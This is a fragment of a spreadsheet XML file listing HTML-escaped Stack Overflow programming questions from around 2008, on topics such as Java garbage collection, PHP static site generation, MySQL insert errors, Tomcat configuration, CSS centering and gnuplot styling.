    <t xml:space="preserve">&lt;p&gt;I know that garbage collection is automated in Java. But I understood that if you write &lt;code&gt;System.gc()&lt;/code&gt; in your code the Java VM may or may not decide at runtime to do a garbage collection at that point. How does this work precisely? On what basis/parameters exactly does the VM decide to do (or not do) a GC when it sees a &lt;code&gt;System.gc()&lt;/code&gt;? Are there maybe examples in which case it &lt;strong&gt;is&lt;/strong&gt; a good idea to put this in your code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create a site in php and have it generate a static version?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For a particular project I have, no server side code is allowed. How can I create the web site in php (with includes, conditionals, etc) and then have that converted into a static html site that I can give to the client?&lt;/p&gt;
&lt;p&gt;Update: Thanks to everyone who suggested wget. That's what I used. I should have specified that I was on a PC, so I grabbed the windows version from here: &lt;a href="http://gnuwin32.sourceforge.net/packages/wget.htm"&gt;http://gnuwin32.sourceforge.net/packages/wget.htm&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any tools to visualize a RDF graph? (please include a screenshot)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a tool that will render a RDF graph in a reasonably useful graphic format.  The primary purpose of the graphic format being inclusion into a PowerPoint slide or printing on a large plotter for management review.&lt;/p&gt;
&lt;p&gt;I am currently using TopBraid Composer which does a reasonably well at visualizing a single entity but doesn't seem to have a clear way of visualizing the entire graph (as a whole).&lt;/p&gt;
&lt;p&gt;Anyone know of any good solutions to this problem?&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i37.tinypic.com/2gufbz9.jpg" alt="TopBraid Composer Graph view screenshot" /&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a new signal in pygtk</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a python object, but I want to send signals on it.  I made it inherit from gobject.GObject, but there doesn't seem to be any way to create a new signal on my object.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to control the capitalization of month and day names returned by DateFormat?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is a quick test program:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public static void main( String[] args )
{
    Date date = Calendar.getInstance().getTime();
    System.out.println("Months:");
    printDate( "MMMM", "en", date );
    printDate( "MMMM", "es", date );
    printDate( "MMMM", "fr", date );
    printDate( "MMMM", "de", date );
    System.out.println("Days:");
    printDate( "EEEE", "en", date );
    printDate( "EEEE", "es", date );
    printDate( "EEEE", "fr", date );
    printDate( "EEEE", "de", date );
}
public static void printDate( String format, String locale, Date date )
{
    System.out.println( locale + ": " + (new SimpleDateFormat( format, new Locale( locale ) )).format( date ) );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output is:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;
Months:
en: September
es: septiembre
fr: septembre
de: September
Days:
en: Monday
es: lunes
fr: lundi
de: Montag&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;How can I control the capitalization of the names. For some reason the Spanish and French always seem to return names that start with a lowercase letter.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is RSpec so slow under Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whenever I run rspec tests for my Rails application it takes forever and a day of overhead before it actually starts running tests.  Why is rspec so slow?  Is there a way to speed up Rails' initial load or single out the part of my Rails app I need (e.g. ActiveRecord stuff only) so it doesn't load absolutely everything to run a few tests?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Promising alternatives to make?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using make and makefiles for many many years, and although the concept
is sound, the implementation has something to be desired.&lt;/p&gt;
&lt;p&gt;Has anyone found any good alternatives to make that don't overcomplicate
the problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom style with Qt</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anybody experience in building a custom style in Qt? What I have in my mind is a complete new style that affects all kind of widgets. I have seen some examples in the web for a custom combo box. But I have no idea how much time and code it takes to build a "complete" new custom style ... maybe someone can give me a hint.&lt;/p&gt;
&lt;p&gt;We think of using Qt 4.3 (or even newer) ...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Integration of JavaScript and JMS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where can I find a guide for integrating JavaScript and JMS (Java Messaging Service)?&lt;/p&gt;
&lt;p&gt;I would like a best practice or established technology that allows me to directly or indirectly receive messages from a topic and update a site based on the message. I was thinking of creating two components, a servlet for the Web module, and an MDB (Message-Driven Bean) for the EJB module. The web client will comsume messages from the JMS topic, and the MDB will handle the onMessage.&lt;/p&gt;
&lt;p&gt;Does this sound correct? Have you seen any examples?&lt;/p&gt;
&lt;p&gt;Edit: I am using ActiveMQ for the JMS.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I run a program as nobody?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want a user-privileged (not root) process to launch new processes as user &lt;code&gt;nobody&lt;/code&gt;. I've tried a straight call to &lt;code&gt;setuid&lt;/code&gt; that fails with -1 &lt;code&gt;EPERM&lt;/code&gt; on &lt;code&gt;Ubuntu 8.04&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
int main() { 
       setuid(65534);
       while (1);
       return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How should I do this instead?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to test credit card interactions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After reading &lt;a href="http://stackoverflow.com/questions/63668/confessions-of-your-worst-wtf-moment-what-not-to-do#63730"&gt;this answer&lt;/a&gt;, I wonder if there's a way to get a "testing" credit card number.  One that you can experiment with but that doesn't actually charge anything.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fast, Pixel Precision 2D Drawing API for Graphics App?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I woud like to create a cross-platform drawing program. The one requirement for writing my app is that I have pixel level precision over the canvas. For instance, I want to write my own line drawing algorithm rather than rely on someone elses. I do not want any form of anti-aliasing (again, pixel level control is required.) I would like the users interactions on the screen to be quick and responsive (pending my ability to write fast algorithms.)&lt;/p&gt;
&lt;p&gt;Ideally, I would like to write this in Python, or perhaps Java as a second choice. The ability to easily make the final app cross-platform is a must. I will submit to different API's on different OS'es if necessary as long as I can write an abstraction layer around them. Any ideas?&lt;/p&gt;
&lt;p&gt;addendum: I need the ability to draw &lt;em&gt;on-screen&lt;/em&gt;. Drawing out to a file I've got figured out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mod_python/MySQL error on INSERT with a lot of data: "OperationalError: (2006, 'MySQL server has gone away')"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When doing an INSERT with a lot of data, ie:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT INTO table (mediumtext_field) VALUES ('...lots of text here: about 2MB worth...')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;MySQL returns &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"OperationalError: (2006, 'MySQL server has gone away')"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is happening within a minute of starting the script, so it is not a timeout issue. Also, &lt;code&gt;mediumtext_field&lt;/code&gt; should be able to hold ~16MB of data, so that shouldn't be a problem.&lt;/p&gt;
&lt;p&gt;Any ideas what is causing the error or how to work around it?&lt;/p&gt;
&lt;p&gt;Some relevant libraries being used: &lt;code&gt;mod_python 3.3.1&lt;/code&gt;, &lt;code&gt;MySQL 5.0.51&lt;/code&gt; (on Windows XP SP3, via xampp, details below)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ApacheFriends XAMPP (basic package) version 1.6.5&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Apache 2.2.6&lt;/li&gt;
&lt;li&gt;MySQL 5.0.51&lt;/li&gt;
&lt;li&gt;phpMyAdmin 2.11.3&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Tool recommendation for converting VB to C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a project with over 500,000 lines of VB.NET that we need to convert to C#. Any recommendations, based on experience, for tools to use? We are using Visual Studio 2008 and we're targeting 3.5 .&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why doesn't BackColor work for TabControls in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you use the standard tab control in .NET for your tab pages and you try to change the look and feel a little bit then you are able to change the back color of the tab pages but not for the tab control. The property is available, you could set it but it has no effect. If you change the back color of the pages and not of the tab control it looks... uhm quite ugly.&lt;/p&gt;
&lt;p&gt;I know Microsoft doesn't want it to be set. &lt;a href="http://msdn.microsoft.com/en/library/w4sc610z(VS.80).aspx" rel="nofollow"&gt;MSDN&lt;/a&gt;: '&lt;i&gt;This property supports the .NET Framework infrastructure and is not intended to be used directly from your code. This member is not meaningful for this control.&lt;/i&gt;' A control property just for color which supports the .NET infrastructure? ...hard to believe.&lt;/p&gt;
&lt;p&gt;I hoped over the years Microsoft would change it but they did not. I created my own TabControl class which overrides the paint method to fix this. But is this really the best solution?&lt;/p&gt;
&lt;p&gt;What is the reason for not supporting BackColor for this control? What is your solution to fix this? Is there a better solution than overriding the paint method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamically Create a generic type for template</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm programming WCF using the ChannelFactory which expects a type in order to call the CreateChannel method. For example: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IProxy proxy = ChannelFactory&amp;lt;IProxy&amp;gt;.CreateChannel(...);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my case I'm doing routing so I don't know what type my channel factory will be using. I can parse a message header to determine the type but I hit a brick wall there because even if I have an instance of Type I can't pass that where ChannelFactory expects a generic type. &lt;/p&gt;
&lt;p&gt;Another way of restating this problem in very simple terms would be that I'm attempting to do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string listtype = Console.ReadLine(); // say "System.Int32"
Type t = Type.GetType( listtype);
List&amp;lt;t&amp;gt; myIntegers = new List&amp;lt;&amp;gt;(); // does not compile, expects a "type"
List&amp;lt;typeof(t)&amp;gt; myIntegers = new List&amp;lt;typeof(t)&amp;gt;(); // interesting - type must resolve at compile time?
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there an approach to this I can leverage within C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does sed fail with International characters and how to fix?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;GNU sed version 4.1.5 seems to fail with International chars. Here is my input file:&lt;/p&gt;
&lt;p&gt;Gras Och Stenar Trad - From Moja to Minneapolis DVD [G2007DVD] 7812 | X
&lt;br&gt;
Gras Och Stenar Trad - From MÃ¶ja to Minneapolis DVD [G2007DVD] 7812 | Y&lt;/p&gt;
&lt;p&gt;(Note the umlaut in second line.)&lt;/p&gt;
&lt;p&gt;And when I do&lt;/p&gt;
&lt;p&gt;sed 's/.*| //' &amp;lt; in&lt;/p&gt;
&lt;p&gt;I would expect to see only the X and Y, as I've asked to remove ALL chars up to the '|' and space beyond it. Instead, I get:&lt;/p&gt;
&lt;p&gt;X&lt;br&gt;
Gras Och Stenar Trad - From M? Y&lt;/p&gt;
&lt;p&gt;I know I can use tr to remove the International chars. first, but is there a way to just use sed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Other than Xcode, are there any full functioned IDEs for Objective-C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know and have Xcode, but I was wondering if there were any other complete development environments that support Objective-C? I'm not looking for solutions with vim or emacs, nor editors like BBEdit that support syntax highlighting, but a full fledged IDE with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;code completion&lt;/li&gt;
&lt;li&gt;compilation&lt;/li&gt;
&lt;li&gt;debugging&lt;/li&gt;
&lt;li&gt;refactoring&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Extra points for being cross platform, supporting vi key bindings and supporting other languages.&lt;/p&gt;
&lt;h3&gt;Note:&lt;/h3&gt;
&lt;p&gt;I've updated and accepted my answer below as Jetbrains has released Early Access for &lt;em&gt;AppCode&lt;/em&gt;, their new Objective-C IDE. Since this has been a fairly popular question, I thought it worthwhile to update the information.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Perl Sys::Syslog on Solaris</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone got &lt;a href="http://perldoc.perl.org/Sys/Syslog.html" rel="nofollow"&gt;Sys::Syslog&lt;/a&gt; to work on Solaris?  (I'm running Sys::Syslog 0.05 on Perl v5.8.4 on SunOS 5.10 on SPARC).  Here's what doesn't work for me:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;openlog "myprog", "pid", "user" or die;
syslog "crit", "%s", "Test from $0" or die;
closelog() or warn "Can't close: $!";
system "tail /var/adm/messages";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Whatever I do, the closelog returns an error and nothing ever gets logged anywhere.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find an example burn-down / planning game template?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to experiment with burn-down and planning game with the team I'm on.  People on my team are interested in making it happen, however I'm sure someone has done this before and has learned some lessons we hopefully don't have to repeat.  Does anyone know of an example Excel (or other tool) template available for burn-down or planning game activities?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any way to pass a structure type to a c function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code with multiple functions very similar to each other to look up an item in a list based on the contents of one field in a structure.  The only difference between the functions is the type of the structure that the look up is occurring in.  If I could pass in the type, I could remove all the code duplication.&lt;/p&gt;
&lt;p&gt;I also noticed that there is some mutex locking happening in these functions as well, so I think I might leave them alone...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to debug a JSP tomcat service using eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to debug my separately running JSP/Struts/Tomcat/Hibernate application stack using the Eclipse IDE debugger. How do I setup the java JVM and eclipse so that I can set breakpoints, monitor variable values, and see the code that is currently executing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to hash a url in ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a web app that points to external links. I'm looking to create a non-sequential, non-guessable id for each document that I can use in the URL. I did the obvious thing: treating the url as a string and str#crypt on it, but that seems to choke on any non-alphanumberic characters, like the slashes, dots and underscores.&lt;/p&gt;
&lt;p&gt;Any suggestions on the best way to solve this problem?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I register a custom type converter in Spring?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to pass a UUID instance via http request parameter. Spring needs a custom type converter (from String) to be registered. How do I register one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wildcards for resources in a Tomcat Servlet's context.xml</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not overly familiar with Tomcat, but my team has inherited a complex project that revolves around a Java Servlet being hosted in Tomcat across many servers. Custom configuration management software is used to write out the server.xml, and various resources (connection pools, beans, server variables, etc) written into server.xml configure the servlet. This is all well and good.&lt;/p&gt;
&lt;p&gt;However, the names of some of the resources aren't known in advance. For example, the Servlet may need access to any number of "Anonymizers" as configured by the operator. Each anonymizer has a unique name associated with it. We create and configure each anonymizer using java beans similar to the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Resource
  name="bean/Anonymizer_toon"
  type="com.company.tomcatutil.AnonymizerBean"
  factory="org.apache.naming.factory.BeanFactory"
  className="teAnonymizer"
  databaseId="50"
/&amp;gt;
&amp;lt;Resource
  name="bean/Anonymizer_default"
  type="com.company.tomcatutil.AnonymizerBean"
  factory="org.apache.naming.factory.BeanFactory"
  className="teAnonymizer"
  databaseId="54"
/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, this appears to require us to have explicit entries in the Servlet's context.xml file for each an every possible resource name in advance. I'd like to replace the explicit context.xml entries with wildcards, or know if there is a better solution to this type of problem.&lt;/p&gt;
&lt;p&gt;Currently:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;ResourceLink name="bean/Anonymizer_default"
                global="bean/Anonymizer_default"
                type="com.company.tomcatutil.AnonymizerBean"/&amp;gt;
  &amp;lt;ResourceLink name="bean/Anonymizer_toon"
                global="bean/Anonymizer_toon"
                type="com.company.tomcatutil.AnonymizerBean"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Replaced with something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;ResourceLink name="bean/Anonymizer_*"
                global="bean/Anonymizer_*"
                type="com.company.tomcatutil.AnonymizerBean"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I haven't been able to figure out if this is possible or what the correct syntax might be. Can anyone make any suggestions about better ways to handle this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Long Do You Keep Your Code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I took a data structures class in C++ last year, and consequently implemented all the major data structures in templated code.  I saved it all on a flash drive because I have a feeling that at some point in my life, I'll use it again.  I imagine &lt;em&gt;something&lt;/em&gt; I end up programming will need a B-Tree, or is that just delusional?  How long do you typically save the code you write for possible reuse?         &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to get a core dump of a running process and its symbol table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to get gdb or use some other tools to create a core dump of a running process and it's symbol table?  It would be great if there's a way to do this without terminating the process.  &lt;/p&gt;
&lt;p&gt;If this is possible, what commands would you use?  (I'm trying to do this on a Linux box)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What level of complexity requires a framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At what level of complexity is it mandatory to switch to an existing framework for web development?&lt;/p&gt;
&lt;p&gt;What measurement of complexity is practical for web development?  Code length?  Feature list?  Database Size?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to start/plan a software project for data collection on a PDA/handheld device</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A friend is having mysterious health problems that we're trying to track down.  One thing that would help would be to improve his record keeping by giving him a handheld device with which he could keep track of various details of his day including diet and environmental factors.&lt;/p&gt;
&lt;p&gt;We will be getting him a device but haven't decided on Palm vs. Windows Mobile vs. other.  I'd like to find some existing software but so far haven't been able to find something that is general enough or customizable to fit our needs.  Ideally I'd like to find an open source project that I can join and contribute while customizing the software to do what I need it to, which I haven't even totally defined yet.&lt;/p&gt;
&lt;p&gt;I'm a C++ developer (way too) familiar with MSVS6 but would be happy to have an excuse to get into .NET or other modern frameworks.  But if the easiest and quickest option is to work with something in C for the Palm I'd be happy to do that as well.  (I've found a good but somewhat dated reference for &lt;a href="http://answers.google.com/answers/threadview/id/123584.html" rel="nofollow"&gt;C++ programming for the Palm&lt;/a&gt;)  Similar and more recent info like this is what I'm looking for.&lt;/p&gt;
&lt;p&gt;Thanks for any advice or suggestions about how to get started with this.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Text Centering Using CSS not working in IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having problems getting text within a table to appear centered in IE. &lt;/p&gt;
&lt;p&gt;In Firefox 2, 3 and Safari everything work fine, but for some reason, the text doesn't appear centered in IE 6 or 7. &lt;/p&gt;
&lt;p&gt;I'm using:&lt;/p&gt;
&lt;pre class="lang-css prettyprint-override"&gt;&lt;code&gt;h2 {
  font: 300 12px "Helvetica", serif; 
  text-align: center; 
  text-transform: uppercase;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've also tried adding &lt;code&gt;margin-left:auto;&lt;/code&gt;, &lt;code&gt;margin-right:auto&lt;/code&gt; and &lt;code&gt;position:relative;&lt;/code&gt; &lt;/p&gt;
&lt;p&gt;to no avail. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are tuples more efficient than lists in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any performance difference between tuples and lists when it comes to instantiation and retrieval of elements? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you have a class in a struct?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible in C# to have a Struct with a member variable which is a Class type?  If so, where does the information get stored, on the Stack, the Heap, or both?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you write a C# Extension Method for a Generically Typed Class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This should hopefully be a simple one.&lt;/p&gt;
&lt;p&gt;I would like to add an extension method to the System.Web.Mvc.ViewPage&amp;lt; T &gt; class.&lt;/p&gt;
&lt;p&gt;How should this extension method look?&lt;/p&gt;
&lt;p&gt;My first intuitive thought is something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace System.Web.Mvc
{
    public static class ViewPageExtensions
    {
        public static string GetDefaultPageTitle(this ViewPage&amp;lt;Type&amp;gt; v)
        {
            return "";
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The general solution is &lt;a href="http://stackoverflow.com/questions/68750/how-do-you-write-a-c-extension-method-for-a-generically-typed-class#68772"&gt;this answer&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The specific solution to extending the System.Web.Mvc.ViewPage class is &lt;a href="http://stackoverflow.com/questions/68750/how-do-you-write-a-c-extension-method-for-a-generically-typed-class#68802"&gt;my answer&lt;/a&gt; below, which started from the &lt;a href="http://stackoverflow.com/questions/68750/how-do-you-write-a-c-extension-method-for-a-generically-typed-class#68772"&gt;general solution&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The difference is in the specific case you need both a generically typed method declaration AND a statement to enforce the generic type as a reference type.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio basicHttpBinding and endpoint problems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WPF application in VS 2008 with some web service references. For varying reasons (max message size, authentication methods) I need to manually define a number of settings in the WPF client's app.config for the service bindings.&lt;/p&gt;
&lt;p&gt;Unfortunately, this means that when I update the service references in the project we end up with a mess - multiple bindings and endpoints. Visual Studio creates new bindings and endpoints with a numeric suffix (ie "Service1" as a duplicate of "Service"), resulting in an invalid configuration as there may only be a single binding per service reference in a project.&lt;/p&gt;
&lt;p&gt;This is easy to duplicate - just create a simple "Hello World" ASP.Net web service and WPF application in a solution, change the maxBufferSize and maxReceivedMessageSize in the app.config binding and then update the service reference.&lt;/p&gt;
&lt;p&gt;At the moment we are working around this by simply undoing checkout on the app.config after updating the references but I can't help but think there must be a better way!&lt;/p&gt;
&lt;p&gt;Also, the settings we need to manually change are:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;security mode="TransportCredentialOnly"&amp;gt;
    &amp;lt;transport clientCredentialType="Ntlm" /&amp;gt;
&amp;lt;/security&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;binding maxBufferSize="655360" maxReceivedMessageSize="655360" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We use a service factory class so if these settings are somehow able to be set programmatically that would work, although the properties don't seem to be exposed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Applescript, how can I find out if a menu item is selected/focused?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a script for OS X 10.5 that focuses the Search box in the Help menu of any application.  I have it on a key combination and, much like Spotlight, I want it to toggle when I run the script.  So, I want to detect if the search box is already focused for typing, and if so, type Esc instead of clicking the Help menu.&lt;/p&gt;
&lt;p&gt;Here is the script as it stands now:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tell application "System Events"
    tell (first process whose frontmost is true)
    	set helpMenuItem to menu bar item "Help" of menu bar 1
    	click helpMenuItem
    end tell
end tell
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I'm thinking of something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tell application "System Events"
    tell (first process whose frontmost is true)
    	set helpMenuItem to menu bar item "Help" of menu bar 1
    	set searchBox to menu item 1 of menu of helpMenuItem
    	if (searchBox's focused) = true then
    		key code 53 -- type esc
    	else
    		click helpMenuItem
    	end if
    end tell
end tell
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... but I get this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Canâ€™t get focused of {menu item 1 of menu "Help" of menu bar item "Help" of menu bar 1 of application process "Script Editor" of application "System Events"}.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So is there a way I can get my script to detect whether the search box is already focused?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I solved my problem by &lt;a href="http://stackoverflow.com/questions/69391/"&gt;working around it&lt;/a&gt;.  I still don't know how to check if a menu item is selected though, so I will leave this topic open.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Agile project and amount of Documentation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What kind of documentation you'd recommend to support for Agile project? What are the core metrics you use to detect amount of documentation needed? Do you think you can store all of project info as TFS work items?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A snippet to monitor the last INSERT/UPDATE in an Oracle DB from C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a simple, sample snippet of C# code to monitor an Oracle database and basically check for its last update. It could be either command line (great for future integration with Nagios) or GUI. I've did some prototypes but the code tend to get lengthy as I'm still kind of learning the language.&lt;/p&gt;
&lt;p&gt;Any suggestion/comment would be much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does a C/C++ program often have optimization turned off in debug mode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In most C or C++ environments, there is a "debug" mode and a "release" mode compilation.&lt;br /&gt;
Looking at the difference between the two, you find that the debug mode adds the debug symbols (often the -g option on lots of compilers) but it also disables most optimizations.&lt;br /&gt;
In "release" mode, you usually have all sorts of optimizations turned on.&lt;br /&gt;
Why the difference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Zend PHP debugger: How can I start debugging a page using a get argument?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying out the debugger built into &lt;code&gt;Zend studio&lt;/code&gt;.  It seems great!  One thing though, when I start a page using the debugger does anyone know how I can set a request get argument within the page?&lt;/p&gt;
&lt;p&gt;For example, I don't want to debug runtests.php&lt;/p&gt;
&lt;p&gt;I want to debug &lt;code&gt;runtests.php?test=10&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I assume its a simple configuration and I just can't find it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to make text unselectable on an HTML page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building an HTML UI with some text elements, such as tab names, which look bad when selected. Unfortunately, it's very easy for a user to double-click a tab name, which selects it by default in many browsers.&lt;/p&gt;
&lt;p&gt;I might be able to solve this with a JavaScript trick (I'd like to see those answers, too) -- but I'm really hoping there's something in CSS/HTML directly that works across all browsers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What Safari-specific pure CSS hacks are out there?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering if there's any way to write CSS specifically for Safari using only CSS. I know there has to be something out there, but I haven't found it yet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting The XML Data Inside Custom XPath function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to get the current xml data when we make our own custom XPath function (see here).&lt;/p&gt;
&lt;p&gt;I know you have access to an &lt;code&gt;XPathContext&lt;/code&gt; but is this enough?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Our XML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;foo&amp;gt;
  &amp;lt;bar&amp;gt;smang&amp;lt;/bar&amp;gt;
  &amp;lt;fizz&amp;gt;buzz&amp;lt;/fizz&amp;gt;
&amp;lt;/foo&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Our XSL:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsl:template match="/"&amp;gt;
  &amp;lt;xsl:value-of select="ourFunction()" /&amp;gt;
&amp;lt;/xsl:template&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do we get the entire XML tree?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; To clarify: I'm creating a custom function that ends up executing static Java code (it's a Saxon feature). So, in this Java code, I wish to be able to get elements from the XML tree, such as bar and fizz, and their CDATA, such as smang and buzz.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I change the background color in gnuplot?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a script that renders graphs in gnuplot. The graphs all end up with an ugly white background. How do I change this? (Ideally, with a command that goes into a gnuplot script, as opposed to a command-line option or something in a settings file)&lt;/p&gt;
</t>
